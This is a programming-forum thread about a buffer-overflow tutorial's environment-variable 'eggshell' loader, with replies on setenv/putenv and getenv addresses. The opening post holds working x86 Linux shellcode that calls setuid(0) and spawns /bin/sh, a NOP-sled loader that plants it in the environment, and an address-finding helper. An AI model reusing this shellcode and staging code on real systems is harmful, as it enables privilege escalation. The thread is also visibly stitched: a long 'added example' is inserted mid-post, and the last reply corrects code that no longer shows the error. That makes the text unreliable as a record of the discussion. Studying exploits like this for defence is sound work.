Thread: Simple question regarding environment variables in Linux

  1. #1
    Registered User
    Join Date
    Dec 2006
    Posts
    15

    Simple question regarding environment variables in Linux

    Hi,

    I'm learning a thing or two about buffer overflows, and a tutorial I'm reading has the following piece of code:
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #define NOP 0x90
    
    /* String literals take double quotes; adjacent literals are concatenated. */
    char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
    "\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
    "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
    "\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
    
    int main(void)
    {
      char shell[513];                  /* 512 bytes of payload plus a terminating NUL */
      puts("Eggshell loaded into environment.");
      memset(shell, NOP, 512);          /* fill with NOPs */
      memcpy(&shell[512 - strlen(shellcode)], shellcode, strlen(shellcode));
      shell[512] = '\0';                /* setenv() expects a C string, so terminate it */
      setenv("EGG", shell, 1);
      putenv(shell);    // [1]
      system("bash"); // [2]
      return 0;
    }
    Most of it is perfectly clear, it loads the shellcode into an environment variable, but what I am confused about is lines [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of these 2 lines?

    The tutorial also gives a second piece of code (to retrieve the memory address of the environment variable).
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    
    int main(void)
    {
       /* getenv() returns a pointer into the environment; print it as an address */
       printf("%p\n", (void *)getenv("EGG"));
       return 0;
    }
    This is strange to me (and it doesn't work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?

    Any help would be appreciated.

  2. #2
    Officially An Architect brewbuck's Avatar
    Join Date
    Mar 2007
    Location
    Portland, OR
    Posts
    7,396
    Quote Originally Posted by nickkrym:
    Most of it is perfectly clear, it loads the shellcode into an environment variable, but what I am confused about is lines [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of these 2 lines?
    There is no point. They perform the same function. The "tutor" who wrote this code is stupid, like most crackers. (Just studying this stuff doesn't make you a cracker, by the way.)

    This is strange to me (and it doesn't work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?
    getenv returns a direct pointer into the environment. So it IS returning the address of the variable. Try overwriting the returned location with other data -- you'll corrupt other environment variables.
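    The following is an added example, not code from this thread or from the tutorial the OP is reading. It shows concretely what brewbuck describes: getenv() hands back a pointer into the process's own environ[] strings rather than a copy, so printing that pointer with %p gives the address of the variable's value, and a write through it changes the environment in place. The variable name DEMO_VAR and its value are constructed for the demo, and find_env_entry, getenv_aliases_environ and overwrite_via_getenv are the example's own helpers. The length check in overwrite_via_getenv is there to show why an unchecked write through that pointer runs into the neighbouring "NAME=value" strings, and how to avoid it.

```c
#define _POSIX_C_SOURCE 200112L   /* for setenv() under a strict -std=c99 build */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;            /* the process environment: "NAME=value" strings, NULL-terminated */

/* Find the environ[] entry holding NAME (the whole "NAME=value" string), or NULL. */
static char *find_env_entry(const char *name)
{
    size_t n = strlen(name);
    for (char **e = environ; e != NULL && *e != NULL; e++) {
        if (strncmp(*e, name, n) == 0 && (*e)[n] == '=')
            return *e;
    }
    return NULL;
}

/* Return 1 if getenv(name) points straight into that environ[] entry (just past
 * "NAME="), i.e. it is an address inside the live environment and not a copy;
 * 0 if the variable is unset or the pointer does not alias the entry. */
int getenv_aliases_environ(const char *name)
{
    char *entry = find_env_entry(name);
    char *value = getenv(name);
    if (entry == NULL || value == NULL)
        return 0;
    return value == entry + strlen(name) + 1;
}

/* Write NEWVAL through the pointer getenv() returned.  The length check is what
 * keeps this inside the existing "NAME=value" string: without it a longer value
 * would run on into the next environment entry and silently corrupt it.
 * Returns 0 on success, -1 if the variable is unset or NEWVAL would not fit. */
int overwrite_via_getenv(const char *name, const char *newval)
{
    char *value = getenv(name);
    if (value == NULL || strlen(newval) > strlen(value))
        return -1;
    memcpy(value, newval, strlen(newval) + 1);   /* copies the terminating NUL too */
    return 0;
}

int main(void)
{
    /* Constructed sample variable for the demo; any name and value would do. */
    setenv("DEMO_VAR", "hello-world", 1);

    printf("environ entry : %p  \"%s\"\n",
           (void *)find_env_entry("DEMO_VAR"), find_env_entry("DEMO_VAR"));
    printf("getenv() value: %p  \"%s\"\n",
           (void *)getenv("DEMO_VAR"), getenv("DEMO_VAR"));
    printf("getenv() aliases environ[]: %d\n", getenv_aliases_environ("DEMO_VAR"));

    overwrite_via_getenv("DEMO_VAR", "bye");
    printf("after in-place write: \"%s\"\n", getenv("DEMO_VAR"));
    return 0;
}
```

    Build it with `cc -std=c99 -Wall demo.c` and run it: the second printed address is the first one plus the length of "DEMO_VAR=", which is exactly why printing getenv()'s return value is the same as printing the variable's address.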

  3. #3
    Just Lurking Dave_Sinkula's Avatar
    Join Date
    Oct 2002
    Posts
    5,005
    Strings are enclosed within double quotes, not single quotes.
    7. It is easier to write an incorrect program than understand a correct one.
    40. There are two ways to write error-free programs; only the third one works.*

